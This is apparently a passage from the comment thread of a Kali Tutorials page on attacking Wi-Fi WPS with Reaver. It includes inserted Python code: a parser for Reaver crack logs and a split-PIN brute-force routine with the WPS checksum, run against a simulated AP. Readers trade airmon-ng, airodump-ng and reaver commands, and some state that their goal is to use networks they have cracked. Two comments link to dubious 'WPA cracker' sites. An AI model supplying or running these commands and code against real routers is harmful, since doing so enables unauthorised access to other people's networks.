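            # M-numbers are single digits, so string comparison orders them correctly
            if current["furthest"] is None or m.group(1) > current["furthest"]:
                current["furthest"] = m.group(1)
            continue
        m = FAILED.match(line)
        if m:
            failures[m.group(1)] += 1
            continue
        m = RESULT.match(line)
        if m:
            key = {"WPS PIN": "pin", "WPA PSK": "psk", "AP SSID": "ssid"}[m.group(1)]
            result[key] = m.group(2)
    return {"attempts": attempts, "failures": failures, "result": result}


def diagnose(parsed):
    """One-line verdict, separating 'got the PSK' from 'PIN accepted, PSK empty'."""
    r = parsed["result"]
    if r["psk"]:
        return "cracked: PIN %s gave the PSK for SSID %s" % (r["pin"], r["ssid"])
    if r["pin"] is not None and r["psk"] == "":
        return "PIN %s accepted but the credential Reaver reported was empty" % r["pin"]
    last = parsed["attempts"][-1]["furthest"] if parsed["attempts"] else None
    return "not cracked; last attempt reached %s: %s; failures=%s" % (
        last, STAGE_MEANING.get(last, "unexpected stage"), dict(parsed["failures"]))


if __name__ == "__main__":
    parsed = parse_reaver_log(SAMPLE_LOG)
    for a in parsed["attempts"]:
        print(a["pin"], "->", a["furthest"], STAGE_MEANING.get(a["furthest"]))
    print(diagnose(parsed))
```

Run it over a saved Reaver session (`reaver ... -vv | tee reaver.log`) and the per-attempt "furthest" column shows at a glance whether the AP is NACKing M4 (first half wrong), NACKing M6 (second half wrong), or, as in the trace above, reaching M7 and still yielding no usable PSK.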
  56. Hello,
    every time I try either wash or airodump-ng, it comes up saying that it fails to open mon0 for capturing. Do I need to use a Wi-Fi adapter? I'm using the live version of Kali Linux from USB.
    Can anyone help?

    Replies
    1. Instead of wlan0, type
      airmon-ng start wlan0

      ifconfig wlan0mon down
      iwconfig wlan0mon mode monitor
      ifconfig wlan0mon up

      That should work; it did for me.

    2. ifconfig
      Choose your interface card: (wlan0) internal or (wlan1) external.
      ifconfig wlan0 up
      airmon-ng start wlan0 (the monitor interface will be wlan0mon)
      Check whether the AP's WPS is locked or not:
      airodump-ng -c [channel] --wps [wlan..mon]
      Replace [channel] with 1-11, e.g. airodump-ng -c 1 --wps wlan0mon
      Replace [wlan..mon] with your monitor interface, e.g. airodump-ng -c 1 --wps wlan0mon
      With --wps, the display shows whether WPS is locked or not.
      Using airodump-ng gives you better results than wash.

  57. How to Crack WPA/WPA2|WPA/WPA2 Cracker
    http://lobatandawgs.com/54-wpa-wpa2-cracker.html

    http://shanghaiblackgoons.com/57-wpa-wpa2-cracker.html

  58. After reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv

    it shows

    Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
    [-] Failed to retrieve a MAC address for interface 'mon0'...

    Please tell me what to do now.

  59. Even after 2 hours of processing, all that happens on my terminal screen is switching from one channel to another. Is that normal?

  60. When I use the wash command, the RSSI = 00 on all the networks that I can find. In the videos I have watched on YouTube the RSSI values are all different depending on the strength of the signal, so I am guessing this is why I am not having any luck so far cracking any APs.

    Does anyone have a solution for this problem?

    Thanks.

  61. Hi guys, it seems that Kali doesn't work on my PC; it doesn't execute anything. Tell me, what should I do?

  62. Hey fellas, I made a video on YouTube concerning WPS-locked routers. If you have issues like "AP rate limiting detected" or see WPS locked in a wash scan, simply watch this video. Like, share and subscribe.
    https://m.youtube.com/watch?v=y3ByYdVJFqg

  63. Hi, thanks for the tutorial.

    You should add the channel number to the reaver command with the "-c" parameter. It wasn't working for me without it, staying stuck in the "Waiting for beacon" state.
    For example:
    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6

  64. Friend, please help me.
    When I wrote airmon-ng wlan0
    it shows
    ls: cannot access /sys/class/ieee80211/: No such file or directory
    usage: airmon-ng {channel or frequency}

    Please help me.

  65. Hi guys,

    How can you do a brute force of the WPS PIN with a list?

  67. I am getting this message at the end:

    Input/output error

    Any ideas ?

  68. How do I set up wifite using Kali Linux in a VM?

  69. Where can I get the 11000-PIN guess list? I need it for AndroDumpper on mobile.

  70. Hacking Wi-Fi with Reaver can be fun and easy, but for pro work and a better chance, old-school Aircrack is better ;)
    just like it is shown in this post:
    Cracking WPA2 wifi password

  71. Hi, it works fine, but at the end two lines keep repeating:
    Sending EAPOL START request
    WARNING: Receive timeout occurred.

    Can anyone help, please? Thanks.

  72. Hello all... WPA is cracked, well done... so what?
    How can I now connect to the AP and use the cracked Wi-Fi? Because that is finally the main goal: just use it. Thanks in advance and regards.

    Replies
    1. Reaver will provide you with the WPA PSK after it successfully gets the PIN. That PSK is the password of the network.

  73. I am using an external USB Alfa adapter (AWUS036NH), WPS is enabled on the router, and I am in a room directly above the router. At first Reaver just kept trying the same PIN (12345670). After 9 hours it was at 0%. I added -N and it tried a few different PINs and got to 0.03%, then started trying the same PIN over and over again. Any suggestions?

  74. Can you give me some trick on how to do it?

  75. Hi Shashwat,

    Thank you very much for your tutorials they are really useful.

    Reaver has reached 11000 PIN attempts and didn't find the PSK, so now the limit has changed to 20000 PIN attempts. Is this normal?


    Cheers,
    Owl

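Comments 65, 69 and 75 all come back to the same number. A WPS PIN is 8 digits, the last of which is a checksum of the other 7, and the AP confirms the two halves separately (NACK or M5 after Reaver's M4 for the first four digits; NACK or M7 after M6 for the rest), so an attacker needs at most 10^4 + 10^3 = 11,000 guesses rather than 10^7. The Python below is an added example, not Reaver's code or a "pin list" from the tutorial: it implements the checksum, generates the two halves in an order that starts at 12345670 like the trace in comment 55 (the rest of the ordering is this example's own, not a claim about Reaver's), and drives a constructed, lockout-free simulated AP to show the 11,000 bound.

```python
# Added example: WPS PIN checksum and the 11,000-guess bound of the split-PIN attack.
# Not Reaver's source; SimulatedAP and the candidate ordering are this example's own.


def wps_checksum(pin7):
    """Checksum digit for a 7-digit WPS PIN (weights 3,1,3,1,... from the right)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin):
    """True when pin is 8 digits whose last digit is the checksum of the first 7."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def first_half_order():
    """The 10,000 possible first halves. '1234' goes first so the opening guess is
    12345670, as in the trace above; the rest is a plain sweep (this example's choice)."""
    yield "1234"
    for n in range(10_000):
        s = "%04d" % n
        if s != "1234":
            yield s


def second_half_order():
    """The 1,000 free digits of the second half; the 8th digit is derived, not guessed."""
    yield "567"
    for n in range(1_000):
        s = "%03d" % n
        if s != "567":
            yield s


class SimulatedAP:
    """Constructed stand-in for a WPS AP with no lockout. It answers the first-half
    check (what M5 vs. NACK after M4 reveals) and the full-PIN check (M7 vs. NACK
    after M6) and counts how many of each it was asked."""

    def __init__(self, pin):
        if not is_valid_wps_pin(pin):
            raise ValueError("AP PIN must be 8 digits with a valid checksum")
        self._pin = pin
        self.m4_checks = 0
        self.m6_checks = 0

    def accepts_first_half(self, p1):
        self.m4_checks += 1
        return p1 == self._pin[:4]

    def accepts_pin(self, pin):
        self.m6_checks += 1
        return pin == self._pin


MAX_QUERIES = 10_000 + 1_000   # the 11,000 that Reaver's progress counter runs to


def crack_pin(ap):
    """Recover the PIN in at most MAX_QUERIES oracle queries: fix the first half,
    then sweep the 1,000 second halves with the checksum digit filled in."""
    p1 = next((h for h in first_half_order() if ap.accepts_first_half(h)), None)
    if p1 is None:
        return None
    for tail in second_half_order():
        candidate = p1 + tail
        pin = candidate + str(wps_checksum(int(candidate)))
        if ap.accepts_pin(pin):
            return pin
    return None


if __name__ == "__main__":
    ap = SimulatedAP("99999995")    # worst case for this ordering
    print(crack_pin(ap), ap.m4_checks + ap.m6_checks, "<=", MAX_QUERIES)
```

A real AP that rate-limits or locks WPS after a run of failures (the "AP rate limiting detected" and "WPS locked" messages mentioned in comments 60 and 62) breaks the assumption of an unlimited oracle that this simulation relies on, which is why the same 11,000 guesses can take hours on one router and never finish on another.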

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC